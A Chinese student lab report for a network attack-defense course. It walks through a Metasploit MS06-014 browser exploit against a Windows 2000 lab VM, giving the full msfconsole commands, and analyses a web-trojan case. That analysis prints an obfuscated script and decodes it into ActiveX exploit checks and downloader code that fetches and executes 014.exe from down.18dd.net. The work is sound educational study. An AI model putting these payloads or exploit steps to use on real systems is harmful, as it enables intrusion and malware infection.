20221909 2022-2023-2 《网络攻防实践》实践11作业
1.实践内容
1.1 web浏览器渗透攻击
Web浏览器渗透攻击是指通过利用浏览器的漏洞或弱点,向用户的计算机或网络环境中注入恶意代码或获取敏感信息的攻击行为。这些攻击可以通过各种技术和手段来实施,以下是一些常见的浏览器渗透攻击方法:
- 恶意软件下载:攻击者通过操纵网页内容或广告,诱导用户点击链接或下载文件。这些下载的文件可能是恶意软件,如病毒、木马或间谍软件,可以用于窃取用户敏感信息或控制受感染的系统。
- 插件漏洞利用:浏览器插件(如Adobe Flash Player、Java等)常常存在安全漏洞。攻击者可以通过利用这些漏洞来执行恶意代码,以获取用户敏感信息或在受感染的系统上执行任意操作。
- XSS(跨站脚本攻击):攻击者通过向受信任的网站注入恶意脚本,使得这些脚本在用户的浏览器上执行。这些脚本可以窃取用户的登录凭据、会话令牌或其他敏感信息,并将其发送给攻击者。
- CSRF(跨站请求伪造):攻击者通过向用户的浏览器发送伪造的请求,利用用户已经在其他网站上登录的会话凭据,以执行未经授权的操作。这可以导致用户在不知情的情况下执行某些操作,例如更改密码、删除帐户等。
- Clickjacking(点击劫持):攻击者通过在恶意网页上叠加透明的、看似无害的内容,诱使用户在不知情的情况下点击隐藏的按钮或链接。这可以用于执行未经授权的操作,例如转账、发帖等。
- URL欺骗:攻击者可能通过修改URL或伪装成合法的网站来引诱用户访问恶意网站。这些网站可能包含伪造的登录页面,旨在窃取用户的登录凭据。
为了保护自己免受这些攻击的影响,以下是一些防御措施:
- 及时更新浏览器和插件,以获得最新的安全补丁和修复程序。
- 不要从不信任的来源下载或点击链接,特别是避免下载未经验证的软件或插件。
- 使用强密码,并在可能的情况下启用双因素身份验证。
- 注意网站的安全警告和证书,确保您正在与合法的网站进行交互。
- 安装和定期更新安全软件,如防病毒程序和防火墙。
- 避免点击可疑的广告、弹出窗口或来自未知发件人的链接。
- 关注浏览器的安全设置和隐私选项,并根据需要进行配置。
1.2 取证分析实践—网页木马攻击场景分析
网页木马攻击是指通过在网页中嵌入恶意代码或脚本,以实施攻击行为的一种方式。当用户访问包含恶意代码的网页时,该代码将在用户的浏览器中执行,并可能导致以下情况发生:
- 信息窃取:网页木马可以用于窃取用户的敏感信息,如用户名、密码、银行账户信息等。恶意代码可能会通过键盘记录、表单截取或截屏等技术来获取这些信息,并将其发送给攻击者。
- 远程控制:攻击者可以利用网页木马获取对受感染计算机的远程控制权限。这样,他们可以在用户不知情的情况下执行各种操作,如文件操作、系统配置修改、安装其他恶意软件等。
- 网络攻击:网页木马可以被用作发起其他网络攻击的平台。攻击者可以利用受感染计算机的网络资源,进行DDoS(分布式拒绝服务)攻击、钓鱼攻击、传播恶意软件等活动。
- 后门植入:攻击者可以将网页木马作为一个后门,植入到受害者的系统中,以便以后再次进入系统。这样,攻击者可以在需要时再次利用这个后门进行攻击或数据窃取。
为了防范网页木马攻击,以下是一些防御措施:
- 及时更新浏览器和插件,以修复已知的安全漏洞。
- 使用安全软件,如防病毒和防恶意软件程序,定期扫描和检测潜在的恶意代码。
- 避免访问不受信任的网站或点击可疑的链接。
- 定期备份重要的文件和数据,以防止数据丢失。
- 将浏览器安全设置设置为适当的级别,并限制网站对浏览器功能的访问权限。
- 使用浏览器插件或扩展程序,如NoScript、AdBlock Plus等,以增强浏览器的安全性。
- 培养良好的网络安全意识,包括警惕社会工程学攻击、定期修改密码等。
总之,对于网页木马攻击,关键是保持浏览器和操作系统的更新,并采取必要的安全措施来保护自己的计算机和数据免受恶意代码的侵害。
1.3 本次实践内容
(1)web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程
实践过程:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
(2)取证分析实践—网页木马攻击场景分析
实践过程:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
(3)攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
2.实践过程
首先更改主机名为姓名拼音
实验环境
虚拟机 | ip地址 |
---|---|
kali linux | 192.168.11.173 |
win2k | 192.168.11.209 |
winxp | 192.168.11.186 |
2.1 web浏览器渗透攻击
首先攻击机与靶机互ping显示成功,连通性良好
在kali端打开metasploit,输入sudo msfconsole和密码
为得到渗透攻击漏洞模块,接下来输入search MS06-014此步骤是查找MS06-014漏洞。
输入use exploit/windows/browser/ie_createobject完成此步骤
输入show payloads进行查看
选择PAYLOAD为windows/shell/bind_tcp远程Shell连接,输入set payload windows/shell/bind_tcp
设置本机为攻击方输入set Lhost 192.168.11.173(kail的IP)
输入set SRVPORT 80,set URIPATH /,show options
输入exploit进行攻击
在上图中可以看到得到了含有木马的网址:http://192.168.11.173:80/
去靶机win2k里浏览器访问上述网址:
再次回到kali中,发现成功建立了会话。
然后为了验证会话是否有效,用sessions查看连接。使用指令sessions -i 1打开会话。
2.2 取证分析实践—网页木马攻击场景分析
通过上传的pdf,找到new09.htm。
从这两处可以看出 start.html 文件在引用 new09.htm 文件时没有写绝对路径,所以new09.htm 文件与 start.html 文件在同一目录下。
可以看到 new09.htm 文件中,用 iframe 引用了一个 http://aa.18dd.net/aa/kl.htm 文件,又用 javascript 引用了一个http://js.users.51.la/1299644.js 文件。
对它们分别作 MD5 散列,得:
http://aa.18dd.net/aa/kl.htm,32位为7f60672dcd6b5e90b6772545ee219bd3
http://js.users.51.la/1299644.js,32位为23180a42a2ff1192150231b44ffdf3d3
然后按照说明,我们下载这两个文件(从pdf中复制出来):
http://192.168.68.253/scom/hashed/7f60672dcd6b5e90b6772545ee219bd3
http://192.168.68.253/scom/hashed/23180a42a2ff1192150231b44ffdf3d3
显然上面那个文件打开不是我们想要的,下面那个虽是但根本看不懂,都是乱码,所以需要我们把它解密一下。需要找到它的密钥,根据由倒数第三行的:t=utf8to16(xxtea_decrypt(base64decode(t), ‘\x73\x63\x72\x69\x70\x74’)),可以知道这个文件使用了一种XXTEA+Base64的加密方法,我们只要找到它的加密密钥即可,这是一种16进制加密,用16进制转字符串转换器解码,可以知道秘钥密钥为:script。
有了密钥我们就可以解析这个长乱码文件了,找到一个转化网站http://www.wetools.com/js-decode,写入密钥script,白框把文件代码全粘进去就看到解析出的内容了,注意一点都不能落下。点击“解密”,保存得到的结果。
<script>
eval("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x69\x6e\x69\x74\x28\x29\x7b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x29\x3b\x7d\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x6c\x6f\x61\x64\x20\x3d\x20\x69\x6e\x69\x74\x3b\x0d\x0a\x69\x66\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x65\x3b\x0d\x0a\x76\x61\x72\x20\x61\x64\x6f\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22\x6f\x62\x6a\x65\x63\x74\x22\x29\x29\x3b\x0d\x0a\x61\x64\x6f\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x63\x6c\x61\x73\x73\x69\x64\x22\x2c\x22\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x22\x29\x3b\x0d\x0a\x76\x61\x72\x20\x61\x73\x3d\x61\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d\x22\x2c\x22\x22\x29\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x0d\x0a\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x0d\x0a\x65\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74\x54\x69\x6d\x65\x28\x29\x2b\x32\x34\x2a\x36\x30\x2a\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27\x63\x65\x3d\x77\x69\x6e\x64\x6f\x77\x73\x78\x70\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x0d\x0a\x69\x66\x28\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x31\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x0d\x0a\x65\x6c\x73\x65\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x66\x3b\x76\x61\x72\x20\x73\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x66\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x62\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x67\x3b\x76\x61\x72\x20\x70\x70\x73\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x67\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x67\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x70\x70\x73\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x3b\x76\x61\x72\x20\x6f\x62\x6a\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x68\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x6f\x62\x6a\x2e\x44\x6c\x6f\x61\x64\x44\x53\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x64\x6f\x77\x6e\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x2f\x62\x62\x2f\x62\x64\x2e\x63\x61\x62\x22\x2c\x20\x22\x62\x64\x2e\x65\x78\x65\x22\x2c\x20\x30\x29\x7d\x7d\x0d\x0a\x7d\x7d\x7d")
</script>
将上述引号里的内容,去16进制加解密中进行解密,得:
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
从上面代码可以清晰看到存在的一些问题,包括“Adodb.Stream”、“MPS.StormPlayer”、POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”这些都是问题漏洞,我们日常中还都经常使用,可见危险性,其中还存在几个地址需要计算它们的MD5值 “http://down.18dd.net/bb/bd.cab”: 1c1d7b3539a617517c49eee4120783b2
“http://aa.18dd.net/aa/1.js”:5d7e9058a857aa2abee820d5473c5fa4
“http://aa.18dd.net/aa/b.js”:3870c28cc279d457746b3796a262f166
“http://aa.18dd.net/aa/pps.js”:5f0b8bf0385314dbe0e5ec95e6abedc2
转化网址https://md5jiami.bmcx.com/
打开名为5d7e9058a857aa2abee820d5473c5fa4的那个文件
将其中字符放入之前说的转化网址,将看不懂的代码转化为可视代码,翻译出来如下
var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open
("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close
();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}
看着代码我们来做分析,看到里面涉及下载014.exe文件得到http://down.18dd.net/bb/014.exe,后面利用了ADODB漏洞
对http://down.18dd.net/bb/014.exe进行MD5散列,ca4e4a1730b0f69a9b94393d9443b979
-
b.js
先打开b.js对应的文档:
对其进行解密(开头的6个函数的参数提示这是一种加密方法:packed):
得一url文件:http://down.18dd.net/bb/pps.exe, 继续做md5散列:md5(http://down.18dd.net/bb/pps.exe,32) = ff59b3b8961f502289c1b4df8c37e2a4 -
压缩文件bd
打开为exe文件。
将上述得到的四个文件.exe进行md5,发现其实是同一个文件,那随意分析一个即可。
下面进行木马分析:
使用IDA打开pps.exe
在string window中发现了20个用于下载exe文件的链接。
从中推断,这个程序可能生成一个叫"Alletdel.bat"的批处理文件,这个文件中有一个标签叫"try",批处理文件会不断的执行这个标签下一行的命令,命令内容可能是判断文件存在性,更改系统日期,删除某些文件。
2.3 攻防对抗实践—web浏览器渗透攻击攻防
重复实践一的攻击过程,此处不再文字赘述。
靶机中进入192.168.11.173:80/
会话建立
输入sessions 1查看会话
防守方回到靶机浏览器上,用源代码方式打开发过来的字符串
将其中的源代码全选后输入到http://www.esjson.com/htmlformat.html网站上对其进行普通压缩,得到下面框里的一段代码
分析如下代码可以看到它加载了payload,正下面是一行UxKzIIOwzDuPlp.exe打开虚拟机
在防守方任务管理器上找到进程,可以看到文件wsgQrIu0od.exe
在函数uLdZCTrDBfe()中出现了一串数组。查询这些内容可以知道攻击方利用了MS06-014漏洞。
3.学习中遇到的问题及解决
- 问题1:使用密钥script解密时出现问题
- 问题1解决方案:换了个网站就好了
4.学习感想和体会
进行Web渗透攻击对抗并亲身实践后,我学会了分析和利用各种Web应用程序的常见漏洞,更深一步了解了这些漏洞的工作原理,并学会了如何利用它们获取敏感信息或执行未经授权的操作。加强了我对信息收集、漏洞扫描、渗透测试工具Metasploit的使用,以及漏洞利用和后渗透阶段的技巧。增强了对网络安全和防御的理解。更加了解常见的安全风险和威胁,并学到了如何采取措施来保护Web应用程序和网络环境。